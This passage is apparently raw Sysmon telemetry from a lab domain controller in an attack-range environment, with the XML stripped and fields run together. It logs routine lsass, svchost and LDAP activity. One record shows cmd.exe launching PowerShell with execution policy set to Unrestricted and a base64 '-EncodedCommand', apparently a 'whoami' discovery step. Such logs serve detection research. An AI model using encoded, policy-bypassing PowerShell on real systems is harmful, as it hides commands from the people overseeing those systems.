AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local49722-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.684{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49722-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.671{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local49721-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.671{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49721-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.654{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55261- 10341000x80000000000000003501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.736{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.736{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.736{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.721{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.721{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.721{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-6497-6064-8700-00000000AE01}12202076C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-6497-6064-8800-00000000AE01}48124644C:\Windows\system32\cmd.exe{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.712{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6497-6064-FF70-070000000000}0x770ff0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6497-6064-8800-00000000AE01}4812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000003482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-6497-6064-8700-00000000AE01}12202076C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8800-00000000AE01}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 